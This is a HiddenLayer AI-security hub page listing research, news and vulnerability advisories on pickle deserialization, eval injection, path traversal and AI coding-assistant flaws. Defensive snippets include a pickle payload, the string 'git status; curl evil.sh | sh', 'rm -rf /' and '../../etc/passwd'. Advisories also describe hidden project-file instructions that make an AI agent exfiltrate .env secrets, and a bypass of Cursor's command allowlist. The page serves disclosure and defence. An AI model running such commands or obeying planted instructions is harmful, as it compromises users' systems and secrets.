Innovation Hub

Featured Posts

Insights

Model Intelligence

Insights

Introducing Workflow-Aligned Modules in the HiddenLayer AI Security Platform

Insights

Inside HiddenLayer’s Research Team: The Experts Securing the Future of AI

Get all our Latest Research & Insights

Explore our glossary to get clear, practical definitions of the terms shaping AI security, governance, and risk management.

Research

Research

Exploring the Security Risks of AI Assistants like OpenClaw

Research

Agentic ShadowLogic

Research

MCP and the Shift to AI Systems

Research

The Lethal Trifecta and How to Defend Against It

Videos

Report and Guides

Report and Guide

2026 AI Threat Landscape Report

Register today to receive your copy of the report on March 18th and secure your seat for the accompanying webinar on April 8th.

Report and Guide

Securing AI: The Technology Playbook

A practical playbook for securing, governing, and scaling AI applications for Tech companies.

Report and Guide

Securing AI: The Financial Services Playbook

A practical playbook for securing, governing, and scaling AI systems in financial services.

HiddenLayer AI Security Research Advisory

CVE-2026-3071

Flair Vulnerability Report

An arbitrary code execution vulnerability exists in the LanguageModel class due to unsafe deserialization in the load_language_model method. Specifically, the method invokes torch.load() with the weights_only parameter set to False, which causes PyTorch to rely on Python’s pickle module for object deserialization.
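The danger of pickle-based loading can be shown with a minimal, standard-library sketch. The `Payload` class and the harmless `eval("6 * 7")` call are illustrative stand-ins for attacker-controlled content; they are not taken from the affected library.

```python
import pickle

class Payload:
    """Stand-in for a malicious object embedded in a serialized model file."""
    def __reduce__(self):
        # pickle calls this at load time; a real attacker would return
        # something like (os.system, ("malicious command",)) instead of
        # this harmless eval.
        return (eval, ("6 * 7",))

blob = pickle.dumps(Payload())   # bytes an attacker ships inside the "model" file
result = pickle.loads(blob)      # the unsafe load step runs the payload
print(result)                    # 42 -- attacker-chosen code executed on load
```

This is why `torch.load()` defaults to safer behavior in recent versions: passing `weights_only=True` restricts deserialization to tensor data instead of arbitrary pickled objects.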

CVE-2025-62354

Allowlist Bypass in Run Terminal Tool Allows Arbitrary Code Execution During Autorun Mode

When in autorun mode, Cursor checks commands sent to the terminal against an allowlist of specifically approved commands. The checking function contains a logic flaw that allows an attacker to craft a command that executes non-allowed commands.
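A common shape for this bug class, sketched below with hypothetical names (this is not Cursor's actual implementation), is an allowlist check that inspects only the first token of a command, letting shell operators smuggle additional commands past it.

```python
ALLOWED = {"ls", "git", "npm"}

def naive_is_allowed(command: str) -> bool:
    # Flawed check: only the first token is compared against the allowlist,
    # so shell operators like ";" or "|" smuggle extra commands past it.
    return command.split()[0] in ALLOWED

print(naive_is_allowed("git status"))                     # True -- intended use
print(naive_is_allowed("git status; curl evil.sh | sh"))  # True -- bypass
print(naive_is_allowed("rm -rf /"))                       # False -- blocked as expected
```

A robust check has to parse the full command line (or reject shell metacharacters outright) rather than prefix-match a single token.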

CVE-2025-62353

Path Traversal in File Tools Allowing Arbitrary Filesystem Access

A path traversal vulnerability exists within Windsurf’s codebase_search and write_to_file tools. These tools do not properly validate input paths, enabling access to files outside the intended project directory, which can provide attackers a way to read from and write to arbitrary locations on the target user’s filesystem.
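The standard defense is to resolve a user-supplied path before checking containment, as in this sketch (the root directory and function name are illustrative; `Path.is_relative_to` requires Python 3.9+):

```python
from pathlib import Path

PROJECT_ROOT = Path("/tmp/project").resolve()  # assumed workspace root

def resolve_in_project(user_path: str) -> Path:
    # Resolve ".." segments and symlinks *before* the containment check;
    # comparing raw, unresolved strings is exactly what traversal
    # payloads like "../../etc/passwd" exploit.
    candidate = (PROJECT_ROOT / user_path).resolve()
    if not candidate.is_relative_to(PROJECT_ROOT):
        raise ValueError(f"path escapes project root: {user_path}")
    return candidate

print(resolve_in_project("src/main.py"))       # stays inside the root
# resolve_in_project("../../etc/passwd")       # raises ValueError
```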

SAI-ADV-2025-012

Data Exfiltration from Tool-Assisted Setup

Windsurf’s automated tools can execute instructions contained within project files without asking for user permission. This means an attacker can hide instructions within a project file to read and extract sensitive data from project files (such as a .env file) and insert it into web requests for the purposes of exfiltration.

In the News

News
HiddenLayer Selected as Awardee on $151B Missile Defense Agency SHIELD IDIQ Supporting the Golden Dome Initiative

Underpinning HiddenLayer’s unique solution for the DoD and USIC is HiddenLayer’s Airgapped AI Security Platform, the first solution designed to protect AI models and development processes in fully classified, disconnected environments. Deployed locally within customer-controlled environments, the platform supports strict US Federal security requirements while delivering enterprise-ready detection, scanning, and response capabilities essential for national security missions.

News
HiddenLayer Announces AWS GenAI Integrations, AI Attack Simulation Launch, and Platform Enhancements to Secure Bedrock and AgentCore Deployments

As organizations rapidly adopt generative AI, they face increasing risks of prompt injection, data leakage, and model misuse. HiddenLayer’s security technology, built on AWS, helps enterprises address these risks while maintaining speed and innovation.

News
HiddenLayer Joins Databricks’ Data Intelligence Platform for Cybersecurity

On September 30, Databricks officially launched its <a href="https://www.databricks.com/blog/transforming-cybersecurity-data-intelligence?utm_source=linkedin&amp;utm_medium=organic-social">Data Intelligence Platform for Cybersecurity</a>, marking a significant step in unifying data, AI, and security under one roof. At HiddenLayer, we’re proud to be part of this new data intelligence platform, as it represents a significant milestone in the industry's direction.

Insights

Three Distinct Categories Of AI Red Teaming

As we’ve covered previously, AI red teaming is a highly effective means of assessing and improving the security of AI systems. The term “red teaming” appears many times throughout recent public policy briefings regarding AI.

Insights

Securing Your AI: A Guide for CISOs PT4

As AI continues to evolve at a fast pace, implementing comprehensive security measures is vital for trust and accountability. The integration of AI into essential business operations and society underscores the necessity for proactive security strategies. While challenges and concerns exist, there is significant potential for leaders to make strategic, informed decisions. By pursuing clear, actionable guidance and staying well-informed, organizational leaders can effectively navigate the complexities of security for AI. This proactive stance will help reduce risks, ensure the safe and responsible use of AI technologies, and ultimately promote trust and innovation.

Insights

Securing Your AI with Optiv and HiddenLayer

In today’s rapidly evolving artificial intelligence (AI) landscape, securing AI systems has become paramount. As organizations increasingly rely on AI and machine learning (ML) models, ensuring the integrity and security of these models is critical. To address this growing need, HiddenLayer, a pioneering security-for-AI company, offers a scanning solution that enables companies to secure their AI digital supply chain, mitigating the risk of introducing adversarial code into their environments.

Insights

Securing Your AI: A Step-by-Step Guide for CISOs PT3

With AI advancing rapidly, it's essential to implement thorough security measures. The need for proactive security strategies grows as AI becomes more integrated into critical business functions and society. Despite the challenges and concerns, there is considerable potential for leaders to make strategic, informed decisions. Organizational leaders can navigate the complexities of AI security by seeking clear, actionable guidance and staying well-informed. This proactive approach will help mitigate risks, ensure AI technologies' safe and responsible deployment, and ultimately foster trust and innovation.

Insights

Securing Your AI: A Step-by-Step Guide for CISOs PT2

As AI advances at a rapid pace, implementing comprehensive security measures becomes increasingly crucial. The integration of AI into critical business operations and society is growing, highlighting the importance of proactive security strategies. While there are concerns and challenges surrounding AI, there is also significant potential for leaders to make informed, strategic decisions. Organizational leaders can effectively navigate the complexities of security for AI by seeking clear, actionable guidance and staying informed amidst abundant information. This proactive approach will help mitigate risks and ensure AI technologies' safe and responsible deployment, ultimately fostering trust and innovation.

Insights

Securing Your AI: A Step-by-Step Guide for CISOs

As AI advances at a rapid pace, implementing comprehensive security measures becomes increasingly crucial. The integration of AI into critical business operations and society is growing, highlighting the importance of proactive security strategies. While there are concerns and challenges surrounding AI, there is also significant potential for leaders to make informed, strategic decisions. Organizational leaders can effectively navigate the complexities of AI security by seeking clear, actionable guidance and staying informed amidst the abundance of information. This proactive approach will help mitigate risks and ensure AI technologies' safe and responsible deployment, ultimately fostering trust and innovation.

Insights

A Guide to AI Red Teaming

For decades, the concept of red teaming has been adapted from its military roots to simulate how a threat actor could bypass defenses put in place to secure an organization. For many organizations, employing or contracting with ethical hackers to simulate attacks against their computer systems before adversaries attack is a vital strategy to understand where their weaknesses are. As Artificial Intelligence becomes integrated into everyday life, red-teaming AI systems to find and remediate security vulnerabilities specific to this technology is becoming increasingly important.

Insights

Advancements in Security for AI

To help understand the evolving cybersecurity environment, we developed HiddenLayer’s 2024 AI Threat Landscape Report as a practical guide to understanding the security risks that can affect every industry and to provide actionable steps to implement security measures at your organization.

Insights

AI Model Scanner Accelerates Adoption

OpenAI revolutionized the world by launching ChatGPT, marking a pivotal moment in technology history. The AI arms race, where companies speed to integrate AI amidst the dual pressures of rapid innovation and cybersecurity challenges, highlights the inherent risks in AI models. HiddenLayer’s Model Scanner is crucial for identifying and mitigating these vulnerabilities. From the surge of third-party models on platforms like Hugging Face to the Wild West-like rush for AI dominance, this article offers insights into securing AI’s future while enabling businesses to harness its transformative power safely.

Insights

Introducing the Security for AI Council

It’s been just a few short weeks since RSAC 2024, an event that left a lasting impression on all who attended. This year, the theme “The Art of the Possible” resonated deeply, showcasing the industry’s commitment to exploring new horizons and embracing innovative ideas. It was inspiring to witness the collective enthusiasm for Possibility Thinking, a cognitive perspective that focuses on exploring potential opportunities and imagining various scenarios without being constrained by current realities or limitations. It involves a mindset open to new ideas, creative solutions, and innovative thinking. The theme and general ambiance set the stage perfectly for us to launch something big, the Security for AI Council.

Insights

From National Security to Building Trust: The Current State of Securing AI

Consider this sobering statistic: 77% of organizations have been breached through their AI systems in the past year. With organizations deploying thousands of AI models, the critical role of these systems is undeniable. Yet, the security of these models is often an afterthought, brought into the limelight only in the aftermath of a breach, with the security team shouldering the blame.

Insights

Understanding the Threat Landscape for AI-Based Systems

To help understand the evolving cybersecurity environment, we developed HiddenLayer’s 2024 AI Threat Landscape Report as a practical guide to understanding the security risks that can affect every industry and to provide actionable steps to implement security measures at your organization.

Webinars

Offensive and Defensive Security for Agentic AI

Webinars

How to Build Secure Agents

Webinars

Beating the AI Game, Ripple, Numerology, Darcula, Special Guests from Hidden Layer… – Malcolm Harkins, Kasimir Schulz – SWN #471

Webinars

HiddenLayer Webinar: 2024 AI Threat Landscape Report

Webinars

HiddenLayer Model Scanner

Webinars

HiddenLayer Webinar: A Guide to AI Red Teaming

Webinars

HiddenLayer Webinar: Accelerating Your Customer's AI Adoption

Webinars

HiddenLayer: AI Detection Response for GenAI

Webinars

HiddenLayer Webinar: Women Leading Cyber

Research

Exploring the Security Risks of AI Assistants like OpenClaw

Research

Agentic ShadowLogic

Research

MCP and the Shift to AI Systems

Research

The Lethal Trifecta and How to Defend Against It

Research

EchoGram: The Hidden Vulnerability Undermining AI Guardrails

Research

Same Model, Different Hat

Research

The Expanding AI Cyber Risk Landscape

Research

The First AI-Powered Cyber Attack

Research

Prompts Gone Viral: Practical Code Assistant AI Viruses

Research

Persistent Backdoors

Research

Visual Input based Steering for Output Redirection (VISOR)

Research

How Hidden Prompt Injections Can Hijack AI Code Assistants Like Cursor

Report and Guide

2026 AI Threat Landscape Report

Report and Guide

Securing AI: The Technology Playbook

Report and Guide

Securing AI: The Financial Services Playbook

Report and Guide

AI Threat Landscape Report 2025

Report and Guide

HiddenLayer Named a Cool Vendor in AI Security

Report and Guide

A Step-By-Step Guide for CISOs

Report and Guide

AI Threat Landscape Report 2024

Report and Guide

HiddenLayer and Intel eBook

Report and Guide

Forrester Opportunity Snapshot

Report and Guide

Gartner® Report: 3 Steps to Operationalize an Agentic AI Code of Conduct for Healthcare CIOs

News

HiddenLayer Selected as Awardee on $151B Missile Defense Agency SHIELD IDIQ Supporting the Golden Dome Initiative

News

HiddenLayer Announces AWS GenAI Integrations, AI Attack Simulation Launch, and Platform Enhancements to Secure Bedrock and AgentCore Deployments

News

HiddenLayer Joins Databricks’ Data Intelligence Platform for Cybersecurity

News

HiddenLayer Appoints Chelsea Strong as Chief Revenue Officer to Accelerate Global Growth and Customer Expansion

News

HiddenLayer Listed in AWS “ICMP” for the US Federal Government

News

New TokenBreak Attack Bypasses AI Moderation with Single-Character Text Changes

News

Beating the AI Game, Ripple, Numerology, Darcula, Special Guests from Hidden Layer… – Malcolm Harkins, Kasimir Schulz – SWN #471

News

All Major Gen-AI Models Vulnerable to ‘Policy Puppetry’ Prompt Injection Attack

News

One Prompt Can Bypass Every Major LLM’s Safeguards

News

Cyera and HiddenLayer Announce Strategic Partnership to Deliver End-to-End AI Security

News

HiddenLayer Unveils AISec Platform 2.0 to Deliver Unmatched Context, Visibility, and Observability for Enterprise AI Security

News

HiddenLayer AI Threat Landscape Report Reveals AI Breaches on the Rise

SAI Security Advisory

Eval on query parameters allows arbitrary code execution in SharePoint integration list creation

An attacker authenticated to a MindsDB instance with the SharePoint integration installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the SharePoint engine and running an ‘INSERT’ query against it to create a list, where the value given for the ‘list’ parameter contains the code to be executed. This value is passed to an eval function intended to parse valid Python data types from user input, but it also runs any code contained within the query.
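The flaw generalizes beyond this integration: `eval` both parses and executes, while the standard-library `ast.literal_eval` only parses. The sketch below is illustrative (the sample strings are invented, not from MindsDB); the `os.getcwd` call stands in for real attacker code.

```python
import ast

benign = "{'name': 'my_list', 'items': [1, 2, 3]}"    # data a query might carry
payload = "__import__('os').getcwd()"                  # code smuggled into the same field

# The flawed pattern: eval() parses the data but also executes code.
assert eval(benign) == {'name': 'my_list', 'items': [1, 2, 3]}
print(eval(payload))          # runs os.getcwd() -- arbitrary code executes

# The fix: ast.literal_eval() accepts only Python literals and rejects calls.
assert ast.literal_eval(benign) == {'name': 'my_list', 'items': [1, 2, 3]}
try:
    ast.literal_eval(payload)
except ValueError:
    print("payload rejected")
```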

SAI Security Advisory

Eval on query parameters allows arbitrary code execution in ChromaDB integration

An attacker authenticated to a MindsDB instance with the ChromaDB integration installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the ChromaDB engine and running an ‘INSERT’ query against it, where the value given for ‘metadata’ contains the code to be executed. This value is passed to an eval function intended to parse valid Python data types from user input, but it also runs any code contained within the query.

SAI Security Advisory

Eval on query parameters allows arbitrary code execution in Vector Database integrations

An attacker authenticated to a MindsDB instance with any one of several integrations installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the specified integration engine and running an ‘UPDATE’ query against it, containing the code to execute. This code is passed to an eval function intended to parse valid Python data types from user input, but it runs any Python code contained within the value given in the ‘SET embeddings =’ part of the query.

SAI Security Advisory

Eval on query parameters allows arbitrary code execution in Weaviate integration

An attacker authenticated to a MindsDB instance with the Weaviate integration installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the Weaviate engine and running a ‘SELECT WHERE’ clause against it, containing the code to execute. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input, but it will run any arbitrary Python code contained within the value given in the ‘WHERE embeddings =’ part of the clause.

SAI Security Advisory

Unsafe deserialization in Datalab leads to arbitrary code execution

An attacker can place a malicious file called datalabs.pkl within a directory and send that directory to a victim user. When the victim user loads the directory with Datalabs.load, the datalabs.pkl within it is deserialized and any arbitrary code contained within it is executed.

SAI Security Advisory

Eval on CSV data allows arbitrary code execution in the MLCTaskValidate class

An attacker can craft a CSV file containing Python code in one of the values; to trigger execution, the code must be wrapped in square brackets ([]). The maliciously crafted CSV file can then be shared with a victim user as a dataset. When the user creates a multilabel classification task, the CSV is loaded and passed through a validation function, where values wrapped in brackets are passed into an eval function, which executes the Python code contained within.
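A hypothetical sketch of this flawed validation pattern (invented column names, not the library's actual code) shows how a "list-like" cell becomes code execution; the harmless `6 * 7` stands in for a real payload:

```python
import csv
import io

# A dataset cell whose value looks like a list -- but is really code.
csv_text = 'text,labels\nsome example,"[6 * 7]"\n'

results = []
for row in csv.DictReader(io.StringIO(csv_text)):
    value = row["labels"]
    # The flawed pattern: bracket-wrapped values go straight to eval().
    if value.startswith("[") and value.endswith("]"):
        results.append(eval(value))   # attacker-controlled code runs here

print(results)   # [[42]] -- the "label list" was executed as code
```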

SAI Security Advisory

Eval on CSV data allows arbitrary code execution in the ClassificationTaskValidate class

An attacker can craft a CSV file containing Python code in one of the values; to trigger execution, the code must be wrapped in square brackets ([]). The maliciously crafted CSV file can then be shared with a victim user as a dataset. When the user creates a classification task, the CSV is loaded and passed through a validation function, where values wrapped in brackets are passed into an eval function, which executes the Python code contained within.

SAI Security Advisory

safe_eval and safe_exec allow arbitrary code execution

Execution of arbitrary code can be achieved via the safe_eval and safe_exec functions of the llama-index-experimental/llama_index/experimental/exec_utils.py Python file. The functions allow the user to run untrusted code via an eval or exec function while only permitting whitelisted functions. However, an attacker can leverage the whitelisted pandas.read_pickle function or other third-party library functions to achieve arbitrary code execution. This can be exploited in the Pandas Query Engine.

SAI Security Advisory

Exec on untrusted LLM output leading to arbitrary code execution on Evaporate integration

The safe_eval and safe_exec functions are intended to allow the user to run untrusted code in an eval or exec function while disallowing dangerous functions. However, an attacker can use third-party library functions to achieve arbitrary code execution.

SAI Security Advisory

Crafted Wi-Fi network name (SSID) leads to arbitrary command injection

A command injection vulnerability exists in Wyze Cam V4 firmware versions up to and including 4.52.4.9887. An attacker within Bluetooth range of the camera can leverage a crafted network name (SSID) to execute arbitrary commands as root during the camera setup process.

SAI Security Advisory

Deserialization of untrusted data leading to arbitrary code execution

Execution of arbitrary code can be achieved through the deserialization process in the tensorflow_probability/python/layers/distribution_layer.py file within the function _deserialize_function. An attacker can inject a malicious pickle object into an HDF5 formatted model file, which will be deserialized via pickle when the model is loaded, executing the malicious code on the victim machine. An attacker can achieve this by injecting a pickle object into the DistributionLambda layer of the model under the make_distribution_fn key.

SAI Security Advisory

Pickle Load on Sklearn Model Load Leading to Code Execution

An attacker can inject a malicious pickle object into a scikit-learn model file and log it to the MLflow tracking server via the API. When a victim user calls the mlflow.sklearn.load_model function on the model, the pickle file is deserialized on their system, running any arbitrary code it contains.

Stay Ahead of AI Security Risks

Get research-driven insights, emerging threat analysis, and practical guidance on securing AI systems—delivered to your inbox.

By submitting this form, you agree to HiddenLayer's Terms of Use and acknowledge our Privacy Statement.
